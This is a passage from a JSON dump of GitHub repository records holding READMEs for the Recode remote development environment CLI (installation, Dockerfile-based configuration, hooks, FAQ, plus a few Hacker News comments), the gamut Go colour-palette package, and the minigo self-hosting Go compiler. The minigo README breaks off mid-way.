needed](https://github.com/recode-sh/cli/issues/4) \ud83d\udc99).\n\nBefore using Recode, the following dependencies need to be installed:\n\n- [Visual Studio Code](https://code.visualstudio.com/) (currently the sole editor supported).\n\n- [OpenSSH Client](https://www.openssh.com/) (used to access your development environments).\n\n## Installation\n\nThe easiest way to install Recode is by running the following command in your terminal:\n\n```bash\ncurl -sf https://raw.githubusercontent.com/recode-sh/cli/main/install.sh | sh -s -- -b /usr/local/bin latest\n```\n\nThis command could be run as-is or by changing:\n\n - The installation directory by replacing `/usr/local/bin` with your **preferred path**.\n \n - The version installed by replacing `latest` with a **[specific version](https://github.com/recode-sh/cli/releases)**.\n\nOnce done, you could confirm that Recode is installed by running the `recode` command:\n\n```bash\nrecode --help\n```\n\n## Usage\n\n```console\nTo begin, run the command \"recode login\" to connect your GitHub account.\t\n\nFrom there, the most common workflow is:\n\n - recode start : to start a development environment for a specific GitHub repository\n - recode stop : to stop a development environment (without removing your data)\n - recode remove : to remove a development environment AND your data\n \n may be relative to your personal GitHub account (eg: cli) or fully qualified (eg: my-organization/api).\n\nUsage:\n recode [command]\n\nAvailable Commands:\n aws Use Recode on Amazon Web Services\n completion Generate the autocompletion script for the specified shell\n help Help about any command\n login Connect a GitHub account to use with Recode\n\nFlags:\n -h, --help help for recode\n -v, --version version for recode\n\nUse \"recode [command] --help\" for more information about a command.\n```\n\n### Login\n\n```bash\nrecode login\n```\nTo begin, you need to run the `login` command to connect your GitHub account.\n\nRecode requires the following permissions:\n\n - \"*Public SSH keys*\" and \"*Repositories*\" to let you access your repositories from your development environments.\n\t\n - \"*GPG Keys*\" and \"*Personal user data*\" to configure Git and sign your commits (verified badge).\n\n**All your data (including the OAuth access token) are only stored locally in `~/.config/recode/recode.yml` (or in `XDG_CONFIG_HOME` if set).**\n\nThe source code that implements the GitHub OAuth flow is located in the [recode-sh/api](https://github.com/recode-sh/api) repository.\n\n### Start\n\n```bash\nrecode start \n```\nThe `start` command creates and starts a development environment for a specific GitHub repository.\n\nIf a development environment is stopped, it will only be started. If a development environment is already started, only your code editor will be opened.\n\nAn `--instance-type` flag could be passed to specify the instance type that will power your development environment. (*See the corresponding cloud provider repository for default / valid values*).\n\n#### Examples\n\n```bash\nrecode aws start recode-sh/workspace\n```\n\n```bash\nrecode aws start recode-sh/workspace --instance-type t2.medium\n```\n\n### Stop\n\n```bash\nrecode stop \n```\nThe `stop` command stops a started development environment.\n\nStopping means that the underlying instance will be stopped but **your data will be conserved**. You may want to use this command to save costs when the development environment is not used.\n\n#### Example\n\n```bash\nrecode aws stop recode-sh/workspace\n```\n\n### Remove\n\n```bash\nrecode remove \n```\n\nThe `remove` command removes an existing development environment.\n\nRemoving means that the underlying instance **and all your data** will be **permanently removed**.\n\n#### Example\n\n```bash\nrecode aws remove recode-sh/workspace\n```\n\n### Uninstall\n\n```bash\nrecode uninstall\n```\n\nThe `uninstall` command removes all the infrastructure components used by Recode from your cloud provider account. (*See the corresponding cloud provider repository for details*).\n\n**Before running this command, all development environments need to be removed.**\n\n#### Example\n\n```bash\nrecode aws uninstall\n```\n\n## Development environments configuration\n\nIf you think about all the projects you've worked on, you may notice that you've:\n\n - a set of configuration / tools used for all your projects (eg: a preferred timezone / locale, a specific shell...);\n \n - a set of configuration / tools specific for each project (eg: docker compose, go >= 1.18 or node.js >= 14).\n\nThis is what Recode has tried to mimic with *user* and *project* configuration.\n\n#### \ud83d\udca1 Tip: the `--rebuild` flag\n\n```bash\nrecode aws start recode-sh/workspace --rebuild\n```\n\nIf you update the configuration of an existing development environment, you could use the `--rebuild` flag of the `start` command to rebuild it without having to delete it first.\n\n#### \ud83d\udca1 Tip: Docker & Docker compose\n\nDocker and Docker compose are already preinstalled in all development environments so you don't have to install them.\n\n### User configuration\n\nUser configuration corresponds to the set of configuration / tools used for all your projects. To create an user configuration, all you need to do is to:\n\n 1. Create a **repository** named `.recode` in your personal GitHub account.\n \n 2. Add a file named `dev_env.Dockerfile` in it.\n\nThe file `dev_env.Dockerfile` is a regular Dockerfile except that: \n\n - it must derive from `recode-sh/base-dev-env` (more below);\n \n - the user configuration needs to be applied to the user `recode`.\n\nOtherwise, you are free to do what you want with this file and this repository. You could see an example with dotfiles in [recode-sh/.recode](https://github.com/recode-sh/.recode) and use it as a GitHub repository template: \n\n```Dockerfile\n# User's dev env image must derive from recodesh/base-dev-env.\n# See https://github.com/recode-sh/base-dev-env/blob/main/Dockerfile for source.\nFROM recodesh/base-dev-env:latest\n\n# Set timezone\nENV TZ=America/Los_Angeles\n\n# Set locale\nRUN sudo locale-gen en_US.UTF-8\nENV LANG=en_US.UTF-8\nENV LANGUAGE=en_US:en \nENV LC_ALL=en_US.UTF-8\n\n# Install Zsh\nRUN set -euo pipefail \\\n && sudo apt-get --assume-yes --quiet --quiet update \\\n && sudo apt-get --assume-yes --quiet --quiet install zsh \\\n && sudo rm --recursive --force /var/lib/apt/lists/*\n\n# Install OhMyZSH and some plugins\nRUN set -euo pipefail \\\n && sh -c \"$(curl --fail --silent --show-error --location https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\" \\\n && git clone --quiet https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions \\\n && git clone --quiet https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting\n\n# Change default shell for user \"recode\"\nRUN set -euo pipefail \\\n && sudo usermod --shell $(which zsh) recode\n\n# Add all dotfiles to home folder\nCOPY --chown=recode:recode ./dotfiles/.* $HOME/\n```\n\n### Project configuration\n\nProject configuration corresponds to the set of configuration / tools specific for each project. As you may have guessed, to create a project configuration, all you need to do is to:\n\n 1. Create a **directory** named `.recode` in your project's repository.\n \n 2. Add a file named `dev_env.Dockerfile` in it.\n\nThe file `dev_env.Dockerfile` is a regular Dockerfile except that: \n\n - it must derive from `user_dev_env` (your user configuration);\n \n - the user configuration needs to be applied to the user `recode`.\n\nOtherwise, you are free to do what you want with this file and this directory. You could see an example in [recode-sh/workspace](https://github.com/recode-sh/workspace):\n\n```Dockerfile\n# Project's dev env image must derive from \"user_dev_env\"\n# (ie: github_user_name/.recode/dev_env.Dockerfile)\nFROM user_dev_env\n\n# VSCode extensions that need to be installed (optional)\nLABEL sh.recode.vscode.extensions=\"golang.go, zxh404.vscode-proto3, ms-azuretools.vscode-docker\"\n\n# GitHub repositories that need to be cloned (optional) (default to the current one)\nLABEL sh.recode.repositories=\"cli, agent, recode, aws-cloud-provider, base-dev-env, api, .recode, workspace\"\n\n# Reserved args (RECODE_*). Provided by Recode.\n# eg: linux\nARG RECODE_INSTANCE_OS\n# eg: amd64 or arm64\nARG RECODE_INSTANCE_ARCH\n\nARG GO_VERSION=1.18.2\n\n# Install Go and dev dependencies\nRUN set -euo pipefail \\\n && cd /tmp \\\n && LATEST_GO_VERSION=$(curl --fail --silent --show-error --location \"https://golang.org/VERSION?m=text\") \\\n && if [[ \"${GO_VERSION}\" = \"latest\" ]] ; then \\\n GO_VERSION_TO_USE=\"${LATEST_GO_VERSION}\" ; \\\n else \\\n GO_VERSION_TO_USE=\"go${GO_VERSION}\" ; \\\n fi \\\n && curl --fail --silent --show-error --location \"https://go.dev/dl/${GO_VERSION_TO_USE}.${RECODE_INSTANCE_OS}-${RECODE_INSTANCE_ARCH}.tar.gz\" --output go.tar.gz \\\n && sudo tar --directory /usr/local --extract --file go.tar.gz \\\n && rm go.tar.gz \\\n && /usr/local/go/bin/go install golang.org/x/tools/cmd/goimports@latest \\\n && /usr/local/go/bin/go install github.com/google/wire/cmd/wire@latest \\\n && /usr/local/go/bin/go install github.com/golang/mock/mockgen@latest\n\n# Add Go to path\nENV PATH=$PATH:/usr/local/go/bin:$HOME/go/bin\n\n...\n```\n#### \ud83d\udca1 What if I don't have an user configuration?\n\nIf you don't have an user configuration, **the [recode-sh/.recode](https://github.com/recode-sh/.recode) repository will be used as a default one**.\n\nThat's why you will have `zsh` configured as default shell in your project.\n\n### Recode configuration\n\nAs you may have noticed from previous sections, some commands in the `dev_env.Dockerfile` files (like the `LABEL` ones) are specific to Recode. This section will try to explain them.\n\n#### Base image ([recode-sh/base-dev-env](http://github.com/recode-sh/base-dev-env))\n\nAs you may have understood, all the development environments derive directly or indirectly from `recode-sh/base-dev-env`. You could see the source of this Docker image in the [recode-sh/base-dev-env](https://github.com/recode-sh/base-dev-env) repository:\n\n```Dockerfile\n# All development environments will be Ubuntu-based\nFROM ubuntu:22.04\n\nARG DEBIAN_FRONTEND=noninteractive\n\n# RUN will use bash\nSHELL [\"/bin/bash\", \"-c\"]\n\n# We want a \"standard Ubuntu\"\n# (ie: not one that has been minimized\n# by removing packages and content\n# not required in a production system)\nRUN yes | unminimize\n\n# Install system dependencies\nRUN set -euo pipefail \\\n && apt-get --assume-yes --quiet --quiet update \\\n && apt-get --assume-yes --quiet --quiet install \\\n apt-transport-https \\\n build-essential \\\n ca-certificates \\\n curl \\\n git \\\n gnupg \\\n locales \\\n lsb-release \\\n man-db \\\n manpages-posix \\\n nano \\\n sudo \\\n tzdata \\\n unzip \\\n vim \\\n wget \\\n && rm --recursive --force /var/lib/apt/lists/*\n\n# Install the Docker CLI. \n# The Docker daemon socket will be mounted from instance.\nRUN set -euo pipefail \\\n && curl --fail --silent --show-error --location https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor --output /usr/share/keyrings/docker-archive-keyring.gpg \\\n && echo \"deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release --codename --short) stable\" | tee /etc/apt/sources.list.d/docker.list > /dev/null \\\n && apt-get --assume-yes --quiet --quiet update \\\n && apt-get --assume-yes --quiet --quiet install docker-ce-cli \\\n && rm --recursive --force /var/lib/apt/lists/*\n\n# Install Docker compose\nRUN set -euo pipefail \\\n && LATEST_COMPOSE_VERSION=$(curl --fail --silent --show-error --location \"https://api.github.com/repos/docker/compose/releases/latest\" | grep --only-matching --perl-regexp '(?<=\"tag_name\": \").+(?=\")') \\\n && curl --fail --silent --show-error --location \"https://github.com/docker/compose/releases/download/${LATEST_COMPOSE_VERSION}/docker-compose-$(uname --kernel-name)-$(uname --machine)\" --output /usr/libexec/docker/cli-plugins/docker-compose \\\n && chmod +x /usr/libexec/docker/cli-plugins/docker-compose\n\n# Install entrypoint script\nCOPY ./recode_entrypoint.sh /\nRUN chmod +x /recode_entrypoint.sh\n\n# Configure the user \"recode\" in container.\n# Triggered during build on instance.\n# \n# We want the user \"recode\" inside the container to get \n# the same permissions than the user \"recode\" in the instance \n# (to access the Docker daemon, SSH keys and so on).\n# \n# To do this, the two users need to share the same UID/GID.\nONBUILD ARG RECODE_USER_ID\nONBUILD ARG RECODE_USER_GROUP_ID\nONBUILD ARG RECODE_DOCKER_GROUP_ID\n\nONBUILD RUN set -euo pipefail \\\n && RECODE_USER_HOME_DIR=\"/home/recode\" \\\n && RECODE_USER_WORKSPACE_DIR=\"${RECODE_USER_HOME_DIR}/workspace\" \\\n && RECODE_USER_WORKSPACE_CONFIG_DIR=\"${RECODE_USER_HOME_DIR}/.workspace-config\" \\\n && groupadd --gid \"${RECODE_USER_GROUP_ID}\" --non-unique recode \\\n && useradd --gid \"${RECODE_USER_GROUP_ID}\" --uid \"${RECODE_USER_ID}\" --non-unique --home \"${RECODE_USER_HOME_DIR}\" --create-home --shell /bin/bash recode \\\n && cp /etc/sudoers /etc/sudoers.orig \\\n && echo \"recode ALL=(ALL) NOPASSWD:ALL\" | tee /etc/sudoers.d/recode > /dev/null \\\n && groupadd --gid \"${RECODE_DOCKER_GROUP_ID}\" --non-unique docker \\\n && usermod --append --groups docker recode \\\n && mkdir --parents \"${RECODE_USER_WORKSPACE_CONFIG_DIR}\" \\\n && mkdir --parents \"${RECODE_USER_WORKSPACE_DIR}\" \\\n && mkdir --parents \"${RECODE_USER_HOME_DIR}/.ssh\" \\\n && mkdir --parents \"${RECODE_USER_HOME_DIR}/.gnupg\" \\\n && mkdir --parents \"${RECODE_USER_HOME_DIR}/.vscode-server\" \\\n && chown --recursive recode:recode \"${RECODE_USER_HOME_DIR}\" \\\n && chmod 700 \"${RECODE_USER_HOME_DIR}/.gnupg\"\n\nONBUILD WORKDIR /home/recode/workspace\nONBUILD USER recode\n\nONBUILD ENV USER=recode\nONBUILD ENV HOME=/home/recode\nONBUILD ENV EDITOR=/usr/bin/nano\n\nONBUILD ENV RECODE_WORKSPACE=/home/recode/workspace\nONBUILD ENV RECODE_WORKSPACE_CONFIG=/home/recode/.workspace-config\n\n# Only for documentation purpose.\n# Entrypoint and CMD are always set by the \n# Recode agent when running the dev env container.\nONBUILD ENTRYPOINT [\"/recode_entrypoint.sh\"]\nONBUILD CMD [\"sleep\", \"infinity\"]\n\n# Set default timezone\nENV TZ=America/Los_Angeles\n\n# Set default locale\n# /!\\ locale-gen must be run as root\nRUN locale-gen en_US.UTF-8\nENV LANG=en_US.UTF-8\nENV LANGUAGE=en_US:en\nENV LC_ALL=en_US.UTF-8\n```\n\nAs you can see, nothing fancy here. \n\nRecode is built on `ubuntu` with `docker` and `docker compose` pre-installed. An user `recode` is created and configured to be used as the default user. Root privileges are managed via `sudo`.\n\nYour repositories will be cloned in `/home/recode/workspace`. A default timezone and locale are set.\n\n*(To learn more, see the [recode-sh/base-dev-env](https://github.com/recode-sh/base-dev-env) repository)*.\n\n#### Visual Studio Code extensions\n\nIn order to require Visual Studio Code extensions to be installed in your development environment, you need to add a `LABEL` named `sh.recode.vscode.extensions` in your *user's* or *project's* `dev_env.Dockerfile`.\n\n*(As you may have guessed, if this label is added to your user configuration, all your projects will have the listed extensions installed).*\n\nAn extension is identified using its publisher name and extension identifier (`publisher.extension`). You can see the name on the extension's detail page.\n\n##### Example\n\n```Dockerfile\nLABEL sh.recode.vscode.extensions=\"golang.go, zxh404.vscode-proto3, ms-azuretools.vscode-docker\"\n```\n\n#### Multiple repositories\n\nIf you want to use multiple repositories in your development environment, you need to add a `LABEL` named `sh.recode.repositories` in your *project's* `dev_env.Dockerfile`.\n\n**In this case, we recommend you to create an empty repository that will only contain the `.recode` directory (as an example, see the [recode-sh/workspace](https://github.com/recode-sh/workspace) repository).**\n\n*(As you may have guessed, if this label is added to your user configuration it will be ignored).*\n\nRepositories may be set as relative to the current one (eg: `cli`) or fully qualified (eg: `recode-sh/cli`).\n\n##### Example\n\n```Dockerfile\nLABEL sh.recode.repositories=\"cli, agent, recode, aws-cloud-provider, base-dev-env, api, .recode, workspace\"\n```\n\n#### Build arguments (`RECODE_INSTANCE_OS` and `RECODE_INSTANCE_ARCH`)\n\nGiven the nature of this project, you need to take into account the fact that the characteristics of the instance used to run your development environment may vary depending on the one chosen by the final user.\n\nAs an example, an user may want to use an AWS graviton powered instance to run your project and, as a result, your *project's* `dev_env.Dockerfile` must be ready to be built for `ARM`.\n\nTo ease this process, Recode will pass to your `dev_env.Dockerfile` files two build arguments `RECODE_INSTANCE_OS` and `RECODE_INSTANCE_ARCH` that will contain both the current operating system (`linux`) and architecture (eg: `amd64`) respectively.\n\n##### Example\n\n```Dockerfile\n# Reserved args (RECODE_*). Provided by Recode.\n\n# eg: linux\nARG RECODE_INSTANCE_OS\n\n# eg: amd64 or arm64\nARG RECODE_INSTANCE_ARCH\n```\n\n#### Hooks\n\nHooks are shell scripts that will be run during the lifetime of your development environment. To be able to add a hook in a project, all you have to do is to add a directory named `hooks` in your `.recode` **directory**.\n\n##### First Hook\n\nBefore adding your first hook, the following things must be taken into account:\n\n - In the case of development environments **with only one repository**, hooks will only be run if a `dev_env.Dockerfile` file is set.\n \n - In the case of development environments **with multiple repositories**, all the hooks will be run, one after the other.\n \n - **The working directory of your scripts will be set to the root folder of their respective repository before running**.\n\n##### Init\n\nThe `init` hook is run once, **during the first start of your development environment**. You could use it to download your project dependencies, for example.\n\nCurrently, it's the sole hook available. To activate it, you need to add an `init.sh` file in your project's `hooks` directory.\n\n##### Example (taken from the [recode-sh/cli](https://github.com/recode-sh/cli/tree/main/.recode) repository)\n\n```bash\n#!/bin/bash\nset -euo pipefail\n\nlog () {\n echo -e \"${1}\" >&2\n}\n\nlog \"Downloading dependencies listed in go.mod\"\n\ngo mod download\n```\n\n## Frequently asked questions\n\n#### > How does it compare with GitPod / Coder / Codespaces / X?\n\n- 100% Free.\n- 100% Open-source.\n- 100% Private (run on your own cloud provider account).\n- 100% Cost-effective (run on simple VMs not on Kubernetes).\n- 100% Desktop.\n- 100% Multi regions.\n- 100% Customizable (from VM characteristics to installed runtimes).\n- 100% Community-driven (see below).\n\n... and 0% VC-backed. 0% Locked-in. 0% Proprietary config files.\n\n#### > How does it compare with Vagrant / VSCode remote SSH / Container extensions?\n\n- Remote development environments defined as code (with support for user and project configuration).\n- Automatic infrastructure / VM provisionning for multiple cloud providers.\n- Fully integrated with GitHub (private and multiple repositories, verified commits...).\n- Support the pre-installation of VSCode extensions.\n- Doesn't require a VM or Docker to be installed locally.\n- Doesn't tied to a specific code editor.\n\n#### > Why using Docker as a VM and not something like NixOS, for example?\n\nI'm aware that containers are not meant to be used as a VM like that (forgive me for that \ud83d\ude4f) but, at the time of writing, Docker is still the most widely used tool among developers to configure their environment (even if it may certainly change in the future).\n\n#### > Given that my dev env will run in a container does it mean that it will be limited?\n\nMostly not. \n\nGiven the scope of this project (a private instance running in your own cloud provider account), Docker is mostly used for configuration purpose and not to \"isolate\" the VM from your environment.\n\nAs a result, your development environment container will run in **[privileged mode](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities)** in the **[host network](https://docs.docker.com/network/host/)**.\n\n## The future\n\nThis project is **100% community-driven**, meaning that except for bug fixes **no more features will be added**. \n\nThe only features that will be added are the ones that will be [posted as an issue](https://github.com/recode-sh/cli/issues/new) and that will receive a significant amount of upvotes **(>= 10 currently)**.\n\n## License\n\nRecode is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).\n", "readme_type": "markdown", "hn_comments": "very similar, but seems a bit more polished is https://coder.com, you can write your own terraform modules and run it on whatever cloud you want.this is awesome. if you want to share some key insights, i imagine the team at coder would be excited to hear + exchange thoughts on the projectIs there a terminal within it?This is fun. I imagine that vendors these days set a stopwatch before an open source equivalent of their product appears, and that stopwatch time gets less every year (-:Nice one, does it handle port forwarding from inside the OpenVSCodeServer container?Recode is also the more than three decades old CLI utility that converts files between various character sets: https://github.com/rrthomas/recodeDoes it generate some config for AWS/ cloud providers or does it directly do deploy it? I would prefer if there is a easy to review text based config that can be deployed in another step.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "muesli/gamut", "link": "https://github.com/muesli/gamut", "tags": ["hue", "tints", "gamut", "color-palettes", "color-wheel", "themes", "color-schemes", "color-blending"], "stars": 506, "description": "Go package to generate and manage color palettes & schemes \ud83c\udfa8", "lang": "Go", "repo_lang": "", "readme": "# gamut\n\n[![Latest Release](https://img.shields.io/github/release/muesli/gamut.svg)](https://github.com/muesli/gamut/releases)\n[![Build Status](https://github.com/muesli/gamut/workflows/build/badge.svg)](https://github.com/muesli/gamut/actions)\n[![Coverage Status](https://coveralls.io/repos/github/muesli/gamut/badge.svg?branch=master)](https://coveralls.io/github/muesli/gamut?branch=master)\n[![Go ReportCard](https://goreportcard.com/badge/muesli/gamut)](https://goreportcard.com/report/muesli/gamut)\n[![GoDoc](https://godoc.org/github.com/golang/gddo?status.svg)](https://pkg.go.dev/github.com/muesli/gamut)\n\nGo package to generate and manage color palettes & schemes\n\n```go\nimport \"github.com/muesli/gamut\"\nimport \"github.com/muesli/gamut/palette\"\nimport \"github.com/muesli/gamut/theme\"\n```\n\n## Colors\n\ngamut operates on various color spaces internally, but all color values you pass\nin as parameters and all return values will match Go\u2019s color.Color interface.\n\nLet\u2019s start with the basics. Just for convenience there\u2019s a hex-value parser:\n\n```go\ncolor = gamut.Hex(\"#333\")\ncolor = gamut.Hex(\"#ABCDEF\")\n```\n\nBoth the short and standard formats are supported.\n\nConversely you can retrieve the hex encoding of any `color.Color` value:\n\n```go\nhex = gamut.ToHex(color)\n```\n\n### Around the Color Wheel\n\nThe `Darker` and `Lighter` functions darken and lighten respectively a given\ncolor value by a specified percentage, without changing the color's hue:\n\n```go\n// returns a 10% darker version of color\ncolor = gamut.Darker(color, 0.1)\n// returns a 30% lighter version of color\ncolor = gamut.Lighter(color, 0.3)\n```\n\n`Complementary` returns the complementary color for a given color:\n\n```go\ncolor = gamut.Complementary(color)\n```\n\n`Contrast` returns the color with the highest contrast to a given color, either\nblack or white:\n\n```go\ncolor = gamut.Contrast(color)\n```\n\nTo retrieve a color with the same lightness and saturation, but a different\nangle on the color wheel, you can use the HueOffset function:\n\n```go\ncolor = gamut.HueOffset(color, 90)\n```\n\nYou can also go in the opposite direction by using negative values.\n\n### Schemes\n\nAll the following functions return colors of a different hue, but with the same\nlightness and saturation as the given colors:\n\nTriadic schemes are made up of three hues equally spaced around the color wheel:\n\n```go\ncolors = gamut.Triadic(color)\n```\n\nQuadratic schemes are made up of four hues equally spaced around the color wheel:\n\n```go\ncolors = gamut.Quadratic(color)\n```\n\nTetradic schemes are made up by two colors and their complementary values:\n\n```go\ncolors = gamut.Tetradic(color1, color2)\n```\n\nAnalogous schemes are created by using colors that are next to each other on the\ncolor wheel:\n\n```go\ncolors = gamut.Analogous(color)\n```\n\nSplitComplementary schemes are created by using colors next to the complementary\nvalue of a given color:\n\n```go\ncolors = gamut.SplitComplementary(color)\n```\n\n### Warm/Cool Colors\n\n```go\nok = gamut.Warm(color)\nok = gamut.Cool(color)\n```\n\n### Shades, Tints & Tones\n\n`Monochromatic` returns colors of the same hue, but with a different\nsaturation/lightness:\n\n```go\ncolors = gamut.Monochromatic(color, 8)\n```\n\n![Monochromatic Palette](https://github.com/muesli/gamut/blob/master/docs/palette_monochromatic.png)\n\n`Shades` returns colors blended from the given color to black:\n\n```go\ncolors = gamut.Shades(color, 8)\n```\n\n![Shades Palette](https://github.com/muesli/gamut/blob/master/docs/palette_shades.png)\n\n`Tints` returns colors blended from the given color to white:\n\n```go\ncolors = gamut.Tints(color, 8)\n```\n\n![Tints Palette](https://github.com/muesli/gamut/blob/master/docs/palette_tints.png)\n\n`Tones` returns colors blended from the given color to gray:\n\n```go\ncolors = gamut.Tones(color, 8)\n```\n\n![Tones Palette](https://github.com/muesli/gamut/blob/master/docs/palette_tones.png)\n\n### Blending Colors\n\n`Blends` returns interpolated colors by blending two colors:\n\n```go\ncolors = gamut.Blends(color1, color2, 8)\n```\n\n![Blends Palette](https://github.com/muesli/gamut/blob/master/docs/palette_blends.png)\n\n## Palettes\n\nGamut comes with six curated color palettes: Wikipedia, Crayola, CSS, RAL,\nResene, and Monokai. The Wikipedia palette is an import of common colors from\nWikipedia\u2019s List of Colors. New curated palettes and importers are welcome. Send me\na pull request!\n\n| Name | Colors | Source |\n| --------- | -----: | ------------------------------------------------------------ |\n| Wikipedia | 1609 | https://en.wikipedia.org/wiki/List_of_colors_(compact) |\n| Crayola | 180 | https://en.wikipedia.org/wiki/List_of_Crayola_crayon_colors |\n| CSS | 147 | https://developer.mozilla.org/en-US/docs/Web/CSS/color_value |\n| RAL | 213 | https://en.wikipedia.org/wiki/List_of_RAL_colors |\n| Resene | 759 | http://www.resene.co.nz |\n| Monokai | 17 | |\n\nThe function Colors lets you retrieve all colors in a palette:\n\n```go\nfor _, c := range palette.Wikipedia.Colors() {\n fmt.Println(c.Name, c.Color)\n}\n```\n\nThis will print out a list of 1609 color names, as defined by Wikipedia.\n\n### Creating Your Own Palettes\n\n```go\nvar p gamut.Palette\np.AddColors(\n gamut.Colors{\n {\"Name\", gamut.Hex(\"#123456\"), \"Reference\"},\n ...\n }\n)\n```\n\nName and Reference are optional when creating your own palettes.\n\n### Names\n\nEach color in the curated palettes comes with an \u201cofficial\u201d name. You can filter\npalettes by colors with specific names. This code snippet will return a list of\nall \u201cblue\u201d colors in the Wikipedia palette:\n\n```go\ncolors = palette.Wikipedia.Filter(\"blue\")\n```\n\nYou can access a color with a specific name using the `Color` function:\n\n```go\ncolor, ok = palette.Wikipedia.Color(\"Pastel blue\")\n```\n\nCalling a palette\u2019s `Name` function with a given color returns the name & distance\nof the closest (perceptually) matching color in it:\n\n```go\nname, distance = palette.Wikipedia.Name(color)\n// name = \"Baby blue\"\n// distance between 0.0 and 1.0\n```\n\n### Mixing Palettes\n\nYou can combine all colors of two palettes by mixing them:\n\n```go\np = palette.Crayola.MixedWith(palette.Monokai)\n```\n\n### Perception\n\nSometimes you got a slice of colors, but you have a limited color palette to\nwork with. The Clamped function returns a slice of the closest perceptually\nmatching colors in a palette, maintaining the same order as the original slice\nyou provided. Finally you can remix your favorite wallpapers in Crayola-style!\n\n```go\ncolors = palette.Crayola.Clamped(colors)\n```\n\n### Generating Color Palettes\n\nColor Generators, like the provided `PastelGenerator`, `WarmGenerator` or\n`HappyGenerator` can produce random (within the color space constraints of the\ngenerator) color palettes:\n\n```go\ncolors, err = gamut.Generate(8, gamut.PastelGenerator{})\n```\n\n![Pastel Palette](https://github.com/muesli/gamut/blob/master/docs/palette_pastel.png)\n\nThe `SimilarHueGenerator` produces colors with a hue similar to a given color:\n\n```go\ncolors, err = gamut.Generate(8, gamut.SimilarHueGenerator{Color: gamut.Hex(\"#2F1B82\")})\n```\n\n![Similar Hue Palette](https://github.com/muesli/gamut/blob/master/docs/palette_similarhue.png)\n\nUsing the `ColorGenerator` interface, you can also write your own color generators:\n\n```go\ntype BrightGenerator struct {\n\tBroadGranularity\n}\n\nfunc (cc BrightGenerator) Valid(col colorful.Color) bool {\n\t_, _, l := col.Lab()\n\treturn 0.7 <= l && l <= 1.0\n}\n\n...\ncolors, err := gamut.Generate(8, BrightGenerator{})\n```\n\nOnly colors with a lightness between 0.7 and 1.0 will be accepted by this generator.\n\n## Themes\n\n| Name | Colors |\n| ------- | -----: |\n| Monokai | 7 |\n\n### Roles\n\n```go\ncolor = theme.MonokaiTheme.Role(theme.Foreground)\n```\n\nAvailable roles are `Foreground`, `Background`, `Base`, `AlternateBase`, `Text`,\n`Selection`, `Highlight`.\n\n## Feedback\n\nGot some feedback or suggestions? Please open an issue or drop me a note!\n\n* [Twitter](https://twitter.com/mueslix)\n* [The Fediverse](https://mastodon.social/@fribbledom)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "DQNEO/minigo", "link": "https://github.com/DQNEO/minigo", "tags": ["go", "compiler", "golang", "assembly", "parser", "lexer"], "stars": 506, "description": "minigo\ud83d\udc25is a small Go compiler made from scratch. It can compile itself.", "lang": "Go", "repo_lang": "", "readme": "# minigo\ud83d\udc25\n\n[![Go](https://github.com/DQNEO/minigo/workflows/Go/badge.svg)](https://github.com/DQNEO/minigo/actions) [![CircleCI](https://circleci.com/gh/DQNEO/minigo.svg?style=svg)](https://circleci.com/gh/DQNEO/minigo)\n\n\nA Go compiler made from scratch.\n\n# Notice\n\nThis repository is no longer maintained actively.\n\nI made another Go compiler `babygo` from scratch again, which is much more simple, sophisticated and understandable.\n\nPlease look at https://github.com/DQNEO/babygo\n\n\n# Description\n\n`minigo\ud83d\udc25` is a small Go compiler made from scratch. It can compile itself.\n\n* Generates a single static binary executable\n* No dependency on yacc/lex or any external libraries\n* Standard libraries are also made from scratch\n\nIt depends only on GNU Assembler and GNU ld.\n\n`minigo` supports x86-64 Linux only.\n \n# Design\n\nI made this almost without reading the original Go compiler.\n\n`minigo` inherits most of its design from the following:\n\n* 8cc (https://github.com/rui314/8cc)\n* 8cc.go (https://github.com/DQNEO/8cc.go)\n\nThere are several steps in the compilation process.\n\n[go source] -> byte_stream.go -> [byte stream] -> token.go -> [token stream] -> parser.go -> [AST] -> gen.go -> [assembly code]\n\n\n# How to run\n\nYou need Linux, so I would recommend that you use Docker.\n\n```sh\n$ docker run --rm -it -w /mnt -v `pwd`:/mnt dqneo/ubuntu-build-essential:go bash\n```\n\nAfter entering the container, you can build and run it.\n\n```sh\n$ make\n$ ./minigo t/hello/hello.go > hello.s\n$ as -o hello.o hello.s\n$ ld -o hello hello.o\n$ ./hello\nhello world\n```\n\n# How to \"self compile\"\n\n```sh\n$ make\n$ ./minigo --version\nminigo 0.1.0\nCopyright (C) 2019 @DQNEO\n\n$ ./minigo *.go > /tmp/minigo2.s\n$ as -o /tmp/minigo2.o /tmp/minigo2.s\n$ ld -o minigo2 /tmp/minigo2.o\n$ ./minigo2 --version\nminigo 0.1.0\nCopyright (C) 2019 @DQNEO\n\n$ ./minigo2 *.go > /tmp/minigo3.s\n$ as -o /tmp/minigo3.o /tmp/minigo3.s\n$ ld -o minigo3 /tmp/minigo3.o\n$ ./minigo3 --version\nminigo 0.1.0\nCopyright (C) 2019 @DQNEO\n```\n\nYou will see that the contents of 2nd generation compiler and 3rd generation compiler are identical.\n\n```sh\n$ diff /tmp/minigo2.s /tmp/minigo3.s\n```\n\n# Test\n\n```sh\n$ make test\n```\n\n# Debug by gdb\n\nAdd `--cap-add=SYS_PTRACE --security-opt='seccomp=unconfined'` option to `docker run`.\nIt will allow you to use `gdb` in the docker image.\n\n```\ndocker run --cap-add=SYS_PTRACE --security-opt='seccomp=unconfined' -it --rm -w /mnt -v `pwd`:/mnt --tmpfs=/tmp/tmpfs:rw,size=500m,mode=1777 dqneo/ubuntu-build-essential:go bash\n```\n\n## The Assembly language\nWe are currently using GNU assembler in AT&T syntax.\n\nhttps://sourceware.org/binutils/docs/as/i386_002dDependent.html#i386_002dDependent\n\n# 